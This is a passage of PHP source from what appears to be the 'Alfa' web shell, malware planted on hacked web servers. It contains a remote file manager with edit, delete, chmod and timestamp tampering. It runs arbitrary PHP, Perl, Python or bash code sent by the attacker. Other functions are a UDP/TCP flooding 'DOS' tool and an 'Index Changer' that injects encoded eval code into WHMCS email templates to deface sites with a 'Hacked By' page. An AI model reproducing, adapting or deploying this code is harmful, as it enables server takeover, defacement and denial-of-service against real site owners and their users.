3966 $_POST['alfa2'] = 'image';
3967 }
3968 }
3969 }
3970 }
3971}
3972}
3973if($_POST['alfa2'] == "rename" && !empty($_POST['alfa3']) && @is_writable($_POST['alfa1'])){$rename_cache = $_POST['alfa3'];}
3974if(@$_POST['alfa2'] == 'mkfile'){
3975$_POST['alfa1'] = trim($_POST['alfa1']);
3976if($chdir_fals&&$alfa_canruncmd){
3977 if(_alfa_is_writable($_POST["c"])){
3978 alfaEx("cd '".addslashes($_POST["c"])."';touch '".addslashes($alfa1_decoded)."'");
3979 $_POST['alfa2'] = "edit";
3980 }
3981}
3982if(!@file_exists($_POST['alfa1'])){
3983$fp = @fopen($_POST['alfa1'], 'w');
3984if($fp){
3985$_POST['alfa2'] = "edit";
3986fclose($fp);
3987}
3988}else{
3989$_POST['alfa2'] = "edit";
3990}
3991}
3992if(!_alfa_file_exists(@$_POST['alfa1'])){
3993echo __pre()."<center><p><div class=\"txtfont\"><font color='red'>!...FILE DOEST NOT EXITS...!</font></div></p></center></div><script>editor_error=false;removeHistory('".$_POST['alfa4']."');</script>";
3994alfaFooter();
3995return;
3996}
3997if($chdir_fals){
3998$filesize = $file_info[3];
3999$uid["name"] = $file_info[1];
4000$gid["name"] = $file_info[2];
4001$permcolor = alfaPermsColor(array("class"=>$perm_color_class,"num"=>$file_info[5],"human"=>$file_info[6]),true);
4002}else{
4003$uid = function_exists("posix_getpwuid")&&function_exists("fileowner")?@posix_getpwuid(@fileowner($_POST['alfa1'])):'';
4004$gid = function_exists("posix_getgrgid")&&function_exists("filegroup")?@posix_getgrgid(@filegroup($_POST['alfa1'])):'';
4005if(!$uid&&!$gid){
4006$uid['name'] = function_exists("fileowner")?@fileowner($_POST['alfa1']):'';
4007$gid['name'] = function_exists("filegroup")?@filegroup($_POST['alfa1']):'';
4008}
4009$permcolor = alfaPermsColor($_POST['alfa1']);
4010$filesize = @filesize($_POST['alfa1']);
4011if(!isset($uid['name'],$gid['name'])||empty($uid['name'])||empty($gid['name'])){
4012 if(_alfa_can_runCommand()){
4013 list($uid['name'],$gid['name']) = explode(":", alfaEx('stat -c "%U:%G" "'.addslashes($_POST["c"]."/".$_POST["alfa1"]).'"'));
4014 }
4015}
4016}
4017if(substr($_POST['alfa1'], 0, 7) == "phar://"){
4018 $alfa_file_directory = $_POST['alfa1'];
4019}else{
4020 $alfa_file_directory = str_replace("//", "/",($chdir_fals?"":$_POST['c'].'/').$_POST['alfa1']);
4021}
4022echo '<div style="overflow: hidden;white-space: nowrap;text-overflow: ellipsis;"><span class="editor_file_info_vars">Name:</span> '.htmlspecialchars(basename($alfa1_decoded)).' <span class="editor_file_info_vars">Size:</span> '.alfaSize($filesize).' <span class="editor_file_info_vars">Permission:</span> '.$permcolor.' <span class="editor_file_info_vars">Owner/Group:</span> '.$uid['name'].'/'.$gid['name'].' <span class="editor_file_info_vars">Directory:</span> '.dirname($alfa_file_directory).'</div>';
4023if(empty($_POST['alfa2']))$_POST['alfa2'] = 'view';
4024if(!_alfa_is_dir($_POST['alfa1'])){
4025$m = array('View', 'Download', 'Highlight', 'Chmod', 'Rename', 'Touch', 'Delete', 'Image', 'Hexdump');
4026$ftype = "file";
4027}else{
4028$m = array('Chmod', 'Rename', 'Touch');
4029$ftype = "dir";
4030}
4031echo('<div>');
4032foreach($m as $v)
4033echo $v == 'Delete' ? '<a href="javascript:void(0);" onclick="var chk=confirm(\'Are You Sure For Delete This File ?\');chk?editor(\''.addslashes(!isset($rename_cache)?$_POST['alfa1']:$rename_cache).'\',\''.strtolower($v).'\',\'\',\''.$_POST['c'].'\',\''.$_POST['alfa4'].'\',\''.$ftype.'\'):\'\';"><span class="editor_actions">'.((strtolower($v)==@$_POST['alfa2'])?'<b><span class="editor_actions"> '.$v.' </span> </b>':$v).' | </span></a> ' : '<a href="javascript:void(0);" onclick="editor(\''.addslashes(!isset($rename_cache)?$_POST['alfa1']:$rename_cache).'\',\''.strtolower($v).'\',\'\',\''.$_POST['c'].'\',\''.$_POST['alfa4'].'\',\''.$ftype.'\')"><span class="editor_actions">'.((strtolower($v)==@$_POST['alfa2'])?'<b><span class="editor_actions"> '.$v.' </span> </b>':$v).' | </span></a>';
4034echo '</div>';
4035switch($_POST['alfa2']){
4036case 'view':case 'edit':
4037@chdir($_POST['c']);
4038$disabled_btn = "";
4039if(!@is_writable($_POST['alfa1'])&&!_alfa_is_writable($_POST['alfa1'])){
4040$disabled_btn = "disabled=disabled";
4041$disabled_btn_style= 'background: #ff0000;color: #fff;';
4042}
4043if(!empty($_POST['alfa3'])){
4044$_POST['alfa3'] = substr($_POST['alfa3'],1);
4045$time = @filemtime($_POST['alfa1']);
4046$fp = @__write_file($_POST['alfa1'],$_POST['alfa3']);
4047if($chdir_fals&&$alfa_canruncmd){
4048 $rname = $alfa1_decoded;
4049 $randname = $rname.rand(111,9999);
4050 $filepath = dirname($_SERVER["SCRIPT_FILENAME"])."/".$randname;
4051 if($fp = @__write_file($filepath ,$_POST['alfa3'])){
4052 alfaEx("mv '".addslashes($filepath)."' '".addslashes($_POST["alfa1"])."';rm -f '".addslashes($filepath)."'");
4053 }
4054}
4055if($fp){
4056echo 'Saved!<br>';
4057@touch($_POST['alfa1'],$time,$time);
4058}
4059}
4060echo '<div class="editor-view"><div class="view-content editor-ace-controller"><div style="display:inline-block;">'._alfa_load_ace_options("editor").'<button style="border-radius:10px;" class="button ace-controler" onClick="copyToClipboard(this);">Copy</button> <button class="button ace-controler" onclick="alfaAceToFullscreen(this);">Full Screen</button> <button onclick="var ace_val = alfa_ace_editors.editor[this.getAttribute(\'ace_id\')].getValue();editor(\''.addslashes($alfa1_decoded).'\',\'edit\',\'1\'+ace_val,\''.$_POST['c'].'\',\''.$_POST['alfa4'].'\',\''.$ftype.'\');return false;" class="button ace-controler" style="width: 100px;height: 33px;'.$disabled_btn_style.'" '.$disabled_btn.'>save</button></div><pre class="ml1 view_ml_content">';
4061echo htmlspecialchars(__read_file($_POST['alfa1']));
4062echo '</pre></div></div>';
4063break;
4064case 'highlight':
4065@chdir($_POST['c']);
4066if(@is_readable($_POST['alfa1'])){
4067echo '<div class="editor-view"><div class="view-content"><div class="ml1" style="background-color: #e1e1e1;color:black;">';
4068$code = @highlight_file($_POST['alfa1'],true);
4069echo str_replace(array('<span ','</span>'), array('<font ','</font>'),$code).'</div></div></div>';
4070}
4071break;
4072case 'delete':
4073@chdir($_POST['c']);
4074if(@is_writable($_POST['alfa1'])||$GLOBALS["glob_chdir_false"]){
4075$deleted = true;
4076if(!@unlink($_POST['alfa1'])){
4077 $deleted = false;
4078 if($alfa_canruncmd){
4079 if(_alfa_is_writable($_POST['alfa1'])){
4080 alfaEx("rm -f '".addslashes($_POST['alfa1'])."'");
4081 $deleted = true;
4082 }
4083 }
4084}
4085if($deleted)echo 'File Deleted...<script>var elem = $("'.$_POST['alfa4'].'").parentNode;elem.parentNode.removeChild(elem);delete editor_files["'.$_POST['alfa4'].'"];</script>';else echo 'Error...';}
4086break;
4087case 'chmod':
4088@chdir($_POST['c']);
4089if(!empty($_POST['alfa3'])){
4090$perms = 0;
4091for($i=strlen($_POST['alfa3'])-1;$i>=0;--$i)
4092$perms += (int)$_POST['alfa3'][$i]*pow(8, (strlen($_POST['alfa3'])-$i-1));
4093if(!@chmod($_POST['alfa1'], $perms)){
4094if($chdir_fals&&$alfa_canruncmd){
4095alfaEx("cd '".addslashes($_POST["c"])."';chmod ".addslashes($_POST['alfa3'])." '".addslashes($alfa1_decoded)."'");
4096echo('Success!');
4097}else{
4098echo '<font color="#FFFFFF"><b>Can\'t set permissions!</b></font><br><script>document.mf.alfa3.value="";</script>';}
4099}else{echo('Success!');}
4100}
4101clearstatcache();
4102AlfaNum(8,9,10,7,6,5,4,2,1);
4103if($chdir_fals){
4104 $file_perm = $file_info[5];
4105}else{
4106 $file_perm = substr(sprintf('%o', @fileperms($_POST['alfa1'])),-4);
4107}
4108echo '<script>alfa3_="";</script><form onsubmit="editor(\''.addslashes($_POST['alfa1']).'\',\''.$_POST['alfa2'].'\',this.chmod.value,\''.$_POST['c'].'\',\''.$_POST['alfa4'].'\',\''.$ftype.'\');return false;"><input type="text" name="chmod" value="'.$file_perm.'"><input type=submit value=" "></form>';
4109break;
4110case 'hexdump':
4111@chdir($_POST['c']);
4112$c = __read_file($_POST['alfa1']);
4113$n = 0;
4114$h = array('00000000<br>','','');
4115$len = strlen($c);
4116for ($i=0; $i<$len; ++$i) {
4117$h[1] .= sprintf('%02X',ord($c[$i])).' ';
4118switch ( ord($c[$i]) ) {
4119case 0: $h[2] .= ' '; break;
4120case 9: $h[2] .= ' '; break;
4121case 10: $h[2] .= ' '; break;
4122case 13: $h[2] .= ' '; break;
4123default: $h[2] .= $c[$i]; break;
4124}
4125$n++;
4126if ($n == 32) {
4127$n = 0;
4128if ($i+1 < $len) {$h[0] .= sprintf('%08X',$i+1).'<br>';}
4129$h[1] .= '<br>';
4130$h[2] .= "\n";
4131}
4132}
4133echo '<div class="editor-view"><div class="view-content"><table cellspacing=1 cellpadding=5 bgcolor=black><tr><td bgcolor=gray><span style="font-weight: normal;"><pre>'.$h[0].'</pre></span></td><td bgcolor=#282828><pre>'.$h[1].'</pre></td><td bgcolor=#333333><pre>'.htmlspecialchars($h[2]).'</pre></td></tr></table></div></div>';
4134break;
4135case 'rename':
4136@chdir($_POST['c']);
4137$alfa1_escape = addslashes($_POST["alfa1"]);
4138$alfa3_escape = addslashes($_POST["alfa3"]);
4139if(!empty($_POST['alfa3'])){
4140$cmd_rename = false;
4141if($chdir_fals&&$alfa_canruncmd){
4142if(_alfa_is_writable($_POST['alfa1'])){
4143$alfa1_escape = addslashes($alfa1_decoded);
4144alfaEx("cd '".addslashes($_POST['c'])."';mv '".$alfa1_escape."' '".addslashes($_POST['alfa3'])."'");
4145}else{
4146$cmd_rename = true;
4147}
4148}else{
4149$alfa1_escape = addslashes($_POST["alfa1"]);
4150}
4151if(!@rename($_POST['alfa1'], $_POST['alfa3'])&&$cmd_rename){
4152echo 'Can\'t rename!<br>';}else{echo('Renamed!<script>try{$("'.$_POST['alfa4'].'").innerHTML = "<div class=\'editor-icon\'>"+loadType(\''.$alfa3_escape.'\',\''.$ftype.'\',\''.$_POST['alfa4'].'\')+"</div><div class=\'editor-file-name\'>'.$alfa3_escape.'</div>";editor_files["'.$_POST['alfa4'].'"].file = "'.$alfa3_escape.'";updateFileEditor("'.$alfa1_escape.'", "'.$alfa3_escape.'");'.($ftype == "dir"?"updateDirsEditor('".$_POST['alfa4']."','".$alfa1_escape."');":"").'}catch(e){console.log(e)}</script>');$alfa1_escape = $alfa3_escape;}
4153}
4154echo '<form onsubmit="editor(\''.$alfa1_escape.'\',\''.$_POST['alfa2'].'\',this.name.value,\''.$_POST['c'].'\',\''.$_POST['alfa4'].'\',\''.$ftype.'\');return false;"><input type="text" name="name" value="'.addslashes(htmlspecialchars(isset($_POST['alfa3'])&&$_POST['alfa3']!=''?$_POST['alfa3']:$alfa1_decoded)).'"><input type=submit value=" "></form>';
4155break;
4156case 'touch':
4157@chdir($_POST['c']);
4158if( !empty($_POST['alfa3']) ) {
4159$time = strtotime($_POST['alfa3']);
4160if($time){
4161$touched = false;
4162if($chdir_fals&&$alfa_canruncmd){
4163 alfaEx("cd '".addslashes($_POST["c"])."';touch -d '".htmlspecialchars(addslashes($_POST['alfa3']))."' '".addslashes($alfa1_decoded)."'");
4164 $touched = true;
4165}
4166if(!@touch($_POST['alfa1'],$time,$time)&&!$touched)
4167echo 'Fail!';
4168else
4169echo 'Touched!';
4170} else echo 'Bad time format!';
4171}
4172clearstatcache();
4173echo '<script>alfa3_="";</script><form onsubmit="editor(\''.addslashes($_POST['alfa1']).'\',\''.$_POST['alfa2'].'\',this.touch.value,\''.$_POST['c'].'\',\''.$_POST['alfa4'].'\',\''.$ftype.'\');return false;"><input type=text name=touch value="'.date("Y-m-d H:i:s", ($chdir_fals?$file_info[4]:@filemtime($_POST['alfa1']))).'"><input type=submit value=" "></form>';
4174break;
4175case 'image':
4176@chdir($_POST['c']);
4177echo('<hr>');
4178$file = $_POST['alfa1'];
4179$image_info = @getimagesize($file);
4180if(is_array($image_info)||$chdir_fals){
4181$width = (int)$image_info[0];
4182$height = (int)$image_info[1];
4183if($chdir_fals&&$alfa_canruncmd){
4184 $source = alfaEx("cat '".addslashes($file)."' | base64");
4185 list($width, $height) = explode(":", alfaEx("identify -format '%w:%h' '".addslashes($file)."'"));
4186 $mime = explode(":", alfaEx("file --mime-type '".addslashes($file)."'"));
4187 $image_info['mime'] = $mime[1];
4188}else{
4189 $source = __ZW5jb2Rlcg(__read_file($file, false));
4190}
4191$image_info_h = "Image type = <span>[</span> ".$image_info['mime']." <span>]</span><br>Image Size = <span>[ </span>".$width." x ".$height."<span> ]</span><br>";
4192if($width > 800){$width = 800;}
4193echo $content = "<div class='editor-view'><div class='view-content'><center>".$image_info_h."<br><img id='viewImage' style='max-width:100%;border:1px solid green;' src='data:".$image_info['mime'].";base64,".$source."' alt='".$file."'></center></div></div><br>";
4194}
4195break;
4196}
4197echo '</div>';
4198alfaFooter();
4199}
4200function findicon($file,$type){
4201$s = 'http://solevisible.com/icons/';
4202$types = array('json','ppt','pptx','xls','xlsx','msi','config','cgi','pm','c','cpp','cs','java','aspx','asp','db','ttf','eot','woff','woff2','woff','conf','log','apk','cab','bz2','tgz','dmg','izo','jar','7z','iso','rar','bat','sh','alfa','gz','tar','php','php4','php5','phtml','html','xhtml','shtml','htm','zip','png','jpg','jpeg','gif','bmp','ico','txt','js','rb','py','xml','css','sql','htaccess','pl','ini','dll','exe','mp3','mp4','m4a','mov','flv','swf','mkv','avi','wmv','mpg','mpeg','dat','pdf','3gp','doc','docx','docm');
4203if($type!='file'){
4204return ($file=='..'?$s.'back.png':$s.'folder.png');
4205}else{
4206$ext = explode('.',$file);
4207$ext = end($ext);
4208$ext = strtolower($ext);
4209return (in_array($ext,$types)?$s.$ext.'.png':$s.'notfound.png');
4210}
4211}
4212function alfadlfile(){
4213if(isset($_POST['c'],$_POST['file'])){
4214$basename = rawurldecode(basename($_POST['file']));
4215$_POST['file'] = str_replace("//", "/", $_POST['c'].'/'.$basename);
4216$alfa_canruncmd = _alfa_can_runCommand(true,true);
4217if(@is_file($_POST['file']) && @is_readable($_POST['file']) || $alfa_canruncmd){
4218ob_start("ob_gzhandler", 4096);
4219header("Content-Disposition: attachment; filename=\"".addslashes($basename)."\"");
4220header("Content-Type: application/octet-stream");
4221if($GLOBALS["glob_chdir_false"]){
4222 $randname = $basename.rand(111,9999);
4223 $scriptpath = dirname($_SERVER["SCRIPT_FILENAME"]);
4224 $filepath = $scriptpath."/".$randname;
4225 if(_alfa_is_writable($scriptpath)){
4226 alfaEx("cp '".addslashes($_POST["file"])."' '".addslashes($filepath)."'");
4227 readfile($filepath);
4228 @unlink($filepath);
4229 }else{
4230 alfaEx("cat '".addslashes($_POST["file"])."'");
4231 }
4232}else{
4233 readfile($_POST['file']);
4234}
4235}else echo('Error...!');}}
4236function __alfa_set_cookie($key, $value){
4237 $_COOKIE[$key] = $value;
4238 @setcookie($key, $value, time()+(86400 * 7), '/');
4239}
4240function alfaphpeval(){
4241if(isset($_COOKIE["eval_tmpdir"])&&@is_dir($_COOKIE["eval_tmpdir"])){
4242 $tempdir = $_COOKIE["eval_tmpdir"];
4243}else{
4244 $tempdir = dirname(alfaEx("mktemp"));
4245 __alfa_set_cookie("eval_tmpdir", $tempdir);
4246}
4247alfahead();
4248if(isset($_POST['alfa2']) && ($_POST['alfa2'] == 'ini')){
4249echo '<div class=header>';
4250ob_start();
4251$INI=ini_get_all();
4252print '<table border=0><tr>'
4253.'<td class="listing"><font class="highlight_txt">Param</td>'
4254.'<td class="listing"><font class="highlight_txt">Global value</td>'
4255.'<td class="listing"><font class="highlight_txt">Local Value</td>'
4256.'<td class="listing"><font class="highlight_txt">Access</td></tr>';
4257foreach ($INI as $param => $values)
4258print "\n".'<tr>'
4259.'<td class="listing"><b>'.$param.'</td>'
4260.'<td class="listing">'.$values['global_value'].' </td>'
4261.'<td class="listing">'.$values['local_value'].' </td>'
4262.'<td class="listing">'.$values['access'].' </td></tr>';
4263$tmp = ob_get_clean();
4264$tmp = preg_replace('!(body|a:\w+|body, td, th, h1, h2) {.*}!msiU','',$tmp);
4265$tmp = preg_replace('!td, th {(.*)}!msiU','.e, .v, .h, .h th {$1}',$tmp);
4266echo str_replace('<h1','<h2', $tmp) .'</div><br>';
4267}
4268if(isset($_POST['alfa2']) && ($_POST['alfa2'] == 'info')) {
4269echo '<div class=header><style>.p {color:#000;}</style>';
4270ob_start();
4271phpinfo();
4272$tmp = ob_get_clean();
4273$tmp = preg_replace('!(body|a:\w+|body, td, th, h1, h2) {.*}!msiU','',$tmp);
4274$tmp = preg_replace('!td, th {(.*)}!msiU','.e, .v, .h, .h th {$1}',$tmp);
4275echo str_replace('<h1','<h2', $tmp) .'</div><br>';
4276}
4277if(isset($_POST['alfa2']) && ($_POST['alfa2'] == 'exten')) {
4278echo '<div class=header>';
4279ob_start();
4280$EXT=get_loaded_extensions();
4281echo '<table border=0><tr><td class="listing">'.implode('</td></tr>'."\n".'<tr><td class="listing">', $EXT).'</td></tr></table>'.count($EXT).' extensions loaded';
4282echo '</div><br>';
4283}
4284$lang_html = "";
4285foreach(array("php"=>"php ~> [ Windows / Linux ]","perl"=>"perl ~> [ Linux ]","python"=>"python ~> [ Linux ]","bash"=>"bash ~> [ Linux ]") as $key=>$val){$lang_html .= '<option value="'.$key.'" '.($_POST["alfa3"]==$key?"selected":"").'>'.$val.'</option>';}
4286echo '<div class=header><Center><a href=javascript:void(0) onclick="g(\'phpeval\',null,\'\',\'ini\')">| INI_INFO | </a><a href=javascript:void(0) onclick="g(\'phpeval\',null,\'\',\'info\')"> | phpinfo |</a><a href=javascript:void(0) onclick="g(\'phpeval\',null,\'\',\'exten\')"> | extensions |</a></center><br><form class="php-evals" name="pf" method="post" onsubmit="var ace_value=geEvalAceValue(this);g(\'phpeval\',null,ace_value,null,this.language.value); return false;"><div class="txtfont">Select Language: </div> <select name="language" style="width:300px;">'.$lang_html.'</select>'._alfa_load_ace_options("eval").'<br><br><div class="bigarea" style="position:relative;"><div class="php-evals-ace">'.(!empty($_POST['alfa1'])?htmlspecialchars($_POST['alfa1']):"<?php\n\n\techo('hello alfa !');\n\n?>").'</div></div><center><input type="submit" value="" style="margin-top:5px"></center>';
4287echo '</form><pre id="PhpOutput" style="'.(empty($_POST['alfa1'])?'display:none;':'').'margin-top:5px;" class="ml1">';
4288if(!empty($_POST['alfa1'])){
4289if($_POST['alfa3']=="php"){
4290ob_start();
4291eval('?>'.$_POST['alfa1']);
4292$result = htmlspecialchars(ob_get_clean());
4293}elseif(_alfa_can_runCommand()&&$GLOBALS["sys"]=="unix"){
4294 $lang = $_POST['alfa3'];
4295 $filename = "temp".rand(11111,99999);
4296 $temp = $tempdir."/".$filename ;
4297 __write_file($filename, $_POST['alfa1']);
4298 $result = alfaEx("mv {$filename} {$temp};{$lang} {$temp};rm -f {$temp}");
4299 @unlink($filename);
4300 @unlink($temp);
4301}
4302echo '<textarea class="bigarea">'.$result.'</textarea>';
4303}
4304echo '</pre></div>';
4305alfafooter();
4306}
4307function alfahash(){
4308if(!function_exists('hex2bin')) {function hex2bin($p) {return decbin(hexdec($p));}}
4309if(!function_exists('full_urlencode')) {function full_urlencode($p){$r='';for($i=0;$i<strlen($p);++$i)$r.= '%'.dechex(ord($p[$i]));return strtoupper($r);}}
4310$stringTools = array(
4311'Base64_encode ( $string )' => '__ZW5jb2Rlcg($s)',
4312'Base64_decode ( $string )' => '__ZGVjb2Rlcg($s)',
4313'strrev ( $string )' => 'strrev($s)',
4314'bin2hex ( $string )' => 'bin2hex($s)',
4315'hex2bin ( $string )' => 'hex2bin($s)',
4316'md5 ( $string )' => 'md5($s)',
4317'sha1 ( $string )' => 'sha1($s)',
4318'hash ( "sha251", $string ) --> sha251' => 'hash("sha256",$s)',
4319'hash ( "sha384", $string ) --> sha384' => 'hash("sha384",$s)',
4320'hash ( "sha512", $string ) --> sha512' => 'hash("sha512",$s)',
4321'crypt ( $string )' => 'crypt($s)',
4322'crc32 ( $string )' => 'crc32($s)',
4323'str_rot13 ( $string )' => 'str_rot13($s)',
4324'urlencode ( $string )' => 'urlencode($s)',
4325'urldecode ( $string )' => 'urldecode($s)',
4326'full_urlencode ( $string )' => 'full_urlencode($s)',
4327'htmlspecialchars ( $string )' => 'htmlspecialchars($s)',
4328'base64_encode (gzdeflate( $string , 9)) --> Encode' => '__ZW5jb2Rlcg(gzdeflate($s, 9))',
4329'gzinflate (base64_decode( $string )) --> Decode' => '@gzinflate(__ZGVjb2Rlcg($s))',
4330'str_rot13 (base64_encode( $string )) --> Encode' => 'str_rot13(__ZW5jb2Rlcg($s))',
4331'base64_decode (str_rot13( $string )) --> Decode' => '__ZGVjb2Rlcg(str_rot13($s))',
4332'str_rot13 (base64_encode(gzdeflate( $string , 9))) --> Encode' => 'str_rot13(__ZW5jb2Rlcg(gzdeflate($s,9)))',
4333'gzinflate (base64_decode(str_rot13( $string ))) --> Decode' => '@gzinflate(__ZGVjb2Rlcg(str_rot13($s)))',
4334);
4335alfahead();
4336echo '<div class=header>';
4337echo "<form onSubmit='g(\"hash\",null,this.selectTool.value,this.input.value);return false;'><div class='txtfont'>Method:</div> <select name='selectTool' style='width:400px;'>";
4338foreach($stringTools as $k => $v)
4339echo "<option value='".htmlspecialchars($v)."' ".($_POST['alfa1']==$v?'selected':'').">".$k."</option>";
4340echo "</select> <input type='submit' value=' '/><br><textarea name='input' style='margin-top:5px' class='bigarea'>".(empty($_POST['alfa1'])?'':htmlspecialchars(@$_POST['alfa2']))."</textarea></form>";
4341if(!empty($_POST['alfa1'])){
4342$string = addslashes($_POST['alfa2']);
4343$string = str_replace('\"','"',$string);
4344$alg = $_POST['alfa1'];
4345$code = str_replace('$s',"'".$string."'",$alg);
4346ob_start();
4347eval('echo '.$code.';');
4348$res = ob_get_contents();
4349ob_end_clean();
4350if(in_array($alg, $stringTools))echo '<textarea class="bigarea">'.htmlspecialchars($res).'</textarea>';
4351}
4352echo "</div>";
4353alfaFooter();
4354}
4355function alfados(){
4356alfahead();
4357echo '<div class=header>';
4358echo '<center><p><div class="txtfont_header">| DOS |</div></p><form onSubmit="g(\'dos\',null,this.host.value,this.time.value,this.port.value,this.m.value); return false;"><div class="txtfont">Method : <select name="m" style="width:80px;"><option value="udp">UDP</option><option value="tcp">TCP</option></select> Host : <input name="host" type="text" value="localhost" size="25" /> Time : <input name="time" type="text" size="15" /> Port : <input name="port" type="text" size="10" /> <input type="submit" value=" " /></div></form></center><br>';
4359if(!empty($_POST['alfa1']) && !empty($_POST['alfa2']) && !empty($_POST['alfa3'])){
4360echo __pre();
4361$packets=0;
4362ignore_user_abort(true);
4363$exec_time=(int)$_POST['alfa2'];
4364$time=time();
4365$max_time=$exec_time+$time;
4366$host=$_POST['alfa1'];
4367$port=(int)$_POST['alfa3'];
4368$method=$_POST['alfa4'];
4369$out = str_repeat('X',65000);
4370while(1){
4371$packets++;
4372if(time() > $max_time){
4373break;
4374}
4375$fp = @fsockopen($method.'://'.$host, $port, $errno, $errstr, 5);
4376if($fp){
4377fwrite($fp, $out);
4378fclose($fp);
4379}
4380}
4381echo "<center>$packets (" . @round(($packets*65)/1024, 2) . " MB) packets averaging ". @round($packets/$exec_time, 2) . " packets per second</center>";
4382echo "</pre>";
4383}
4384echo '</div>';
4385alfafooter();
4386}
4387function __pre(){return('<pre id="strOutput" style="margin-top:5px" class="ml1">');}
4388function alfaIndexChanger(){
4389alfahead();
4390
4391echo '<div class=header><center><p><div class="txtfont_header">| Index Changer |</div></p><h3><a href=javascript:void(0) onclick="g(\'IndexChanger\',null,null,null,\'whmcs\')">| Whmcs | </a><a href=javascript:void(0) onclick="g(\'IndexChanger\',null,\'vb\',null)">| vBulletin | </a><a href=javascript:void(0) onclick="g(\'IndexChanger\',null,null,\'mybb\')">| MyBB | </a></h3></center>';
4392if(isset($_POST['alfa3'])&&($_POST['alfa3'] == 'whmcs')){
4393echo __pre();
4394
4395echo "<center><center><div class='txtfont_header'>| Whmcs |</div>
4396<p><center>".getConfigHtml('whmcs')."<form onSubmit=\"g('IndexChanger',null,null,null,'whmcs',this.fname.value,this.path.value,this.dbu.value,this.dbn.value,this.dbp.value,this.dbh.value,this.index.value); return false;\">
4397";
4398$table = array('td1' =>
4399 array('color' => 'FFFFFF', 'tdName' => 'Mysql Host', 'inputName' => 'dbh', 'id' => 'db_host', 'inputValue' => 'localhost', 'inputSize' => '50'),
4400 'td2' =>
4401 array('color' => 'FFFFFF', 'tdName' => 'URL', 'inputName' => 'path', 'inputValue' => 'http://site.com/whmcs', 'inputSize' => '50'),
4402 'td3' =>
4403 array('color' => 'FFFFFF', 'tdName' => 'File Name', 'inputName' => 'fname', 'inputValue' => '', 'inputSize' => '50'),
4404 'td4' =>
4405 array('color' => 'FFFFFF', 'tdName' => 'Db Name', 'inputName' => 'dbn', 'id' => 'db_name', 'inputValue' => '', 'inputSize' => '50'),
4406 'td5' =>
4407 array('color' => 'FFFFFF', 'tdName' => 'Db User', 'inputName' => 'dbu', 'id' => 'db_user', 'inputValue' => '', 'inputSize' => '50'),
4408 'td6' =>
4409 array('color' => 'FFFFFF', 'tdName' => 'Db Pass', 'inputName' => 'dbp', 'id' => 'db_pw', 'inputValue' => '', 'inputSize' => '50')
4410);
4411create_table($table);
4412echo "<br><div class='txtfont'>| Your Index |</div><br>
4413<textarea name=index rows='19' cols='103'><title>Hacked By Sole Sad & Invisible</title><b>Hacked By Sole Sad & Invisible</b></textarea><br>
4414<input type='submit' value=' '>
4415</form></center></center>";
4416if(isset($_POST['alfa6'])){
4417$s0levisible="Powered By Solevisible";
4418$dbu = $_POST['alfa6'];
4419$path = $_POST['alfa5'];
4420$fname = $_POST['alfa4'];
4421$dbn = $_POST['alfa7'];
4422$dbp = $_POST['alfa8'];
4423$dbh = $_POST['alfa9'];
4424$index = $_POST['alfa10'];
4425$index = str_replace("\'","'",$index);
4426$deface = '$x = base64_decode("'.__ZW5jb2Rlcg($index).'"); $solevisible = fopen("'.$fname.'","w"); fwrite($solevisible,$x);';
4427$saveData = __ZW5jb2Rlcg($deface);
4428$Def = '{php}eval(base64_decode("'.$saveData.'"));{/php}';
4429if(!empty($dbh)&&!empty($dbu)&&!empty($dbn)&&!empty($index)){
4430$conn=@mysqli_connect($dbh,$dbu,$dbp,$dbn) or die(mysqli_error($conn));
4431$soleSave=@mysqli_query($conn,"select message from tblemailtemplates where name='Password Reset Validation'");
4432$soleGet = mysqli_fetch_assoc($soleSave);
4433$tempSave1 = $soleGet['message'];
4434$tempSave = str_replace("'","\'",$tempSave1);
4435$inject = "UPDATE tblemailtemplates SET message='$Def' WHERE name='Password Reset Validation'";
4436$result=@mysqli_query($conn,$inject) or die (mysqli_error($conn));
4437$create = "insert into tblclients (email) values('solevisible@fbi.gov')";
4438$result2 =@mysqli_query($conn,$create) or die (mysqli_error($conn));
4439if(function_exists('curl_version')){
4440$AlfaSole = new AlfaCURL(true);
4441$saveurl = $AlfaSole->Send($path."/pwreset.php");
4442$getToken = preg_match("/name=\"token\" value=\"(.*?)\"/i",$saveurl,$token);
4443$AlfaSole->Send($path."/pwreset.php","post","token={$token[1]}&action=reset&email=solevisible@fbi.gov");
4444$backdata = "UPDATE tblemailtemplates SET message='{$tempSave}' WHERE name='Password Reset Validation'";
4445$Solevisible = mysqli_query($conn,$backdata) or die (mysqli_error($conn));
4446__alert('File Created...');
4447echo "<br><pre id=\"strOutput\" style=\"margin-top:5px\" class=\"ml1\"><br><center><font color=red><a target='_blank' href='".$path."/".$fname."'>Click Here !</a></font></b></center><br><br>";
4448}else{
4449echo "<br><pre id=\"strOutput\" style=\"margin-top:5px\" class=\"ml1\"><br><center><b><font color=\"#FFFFFF\">Please go to Target </font><font color=red>\" ".$path."/pwreset.php \"</font><br/><font color=\"#FFFFFF\"> and reset password with email</font> => <font color=red>solevisible@fbi.gov</font><br/><font color=\"#FFFFFF\">and go to</font> <font color=red>\" ".$path."/".$fname." \"</font></b></center><br><br>";
4450}}}}
4451if(isset($_POST['alfa1']) && ($_POST['alfa1'] == 'vb')){
4452echo __pre();
4453
4454echo "<center><center><div class='txtfont_header'>| vBulletin |</div>
4455<p><center>".getConfigHtml('vb')."<form onSubmit=\"g('IndexChanger',null,'vb',this.dbu.value,this.dbn.value,this.dbp.value,this.dbh.value,this.index.value,this.prefix.value,'>>'); return false;\">
4456";
4457$table = array('td1' =>
4458 array('color' => 'FFFFFF', 'tdName' => 'Mysql Host', 'inputName' => 'dbh', 'id' => 'db_host', 'inputValue' => 'localhost', 'inputSize' => '50'),
4459 'td2' =>
4460 array('color' => 'FFFFFF', 'tdName' => 'Db Name', 'inputName' => 'dbn', 'id' => 'db_name', 'inputValue' => '', 'inputSize' => '50'),
4461 'td3' =>
4462 array('color' => 'FFFFFF', 'tdName' => 'Db User', 'inputName' => 'dbu', 'id' => 'db_user', 'inputValue' => '', 'inputSize' => '50'),
4463 'td4' =>
4464 array('color' => 'FFFFFF', 'tdName' => 'Db Pass', 'inputName' => 'dbp', 'id' => 'db_pw', 'inputValue' => '', 'inputSize' => '50'),
4465 'td5' =>
4466 array('color' => 'FFFFFF', 'tdName' => 'Prefix', 'inputName' => 'prefix', 'id' => 'db_prefix', 'inputValue' => '', 'inputSize' => '50')
4467);
4468create_table($table);
4469echo "<br><div class='txtfont'>| Your Index |</div><br>
